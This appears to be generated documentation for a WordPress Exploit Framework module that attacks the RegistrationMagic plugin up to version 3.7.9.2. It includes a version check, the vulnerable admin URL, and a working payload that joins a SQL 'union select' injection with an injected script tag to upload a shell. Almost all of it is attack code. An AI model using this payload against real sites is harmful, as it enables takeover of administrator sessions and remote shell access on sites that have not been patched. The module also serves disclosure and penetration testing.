class Wpxf::Exploit::RegistrationMagicReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb, line 7
def initialize
  super

  update_info(
    name: 'RegistrationMagic - Custom Registration Forms <= 3.7.9.2 Reflected XSS Shell Upload',
    author: [
      'rastating'  # Disclosure + WPXF module
    ],
    references: [
      ['WPVDB', '8976'],
      ['URL', 'https://www.rastating.com/registrationmagic-custom-registration-forms-3-7-9-2-reflected-xss']
    ],
    date: 'Dec 10 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb, line 23
def check
  check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '3.7.9.3')
end
url_payload() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb, line 31
def url_payload
  url_encode("-#{Utility::Text.rand_numeric(2)} union select 0,0,0,'<script>#{xss_ascii_encoded_include_script}</script>',concat(0x54,0x65,0x78,0x74,0x62,0x6f,0x78),0,0,0,0,0,0")
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb, line 35
def url_with_xss
  "#{vulnerable_url}?page=rm_field_manage&rm_form_id=#{url_payload}"
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb, line 27
def vulnerable_url
  normalize_uri(wordpress_url_admin, 'admin.php')
end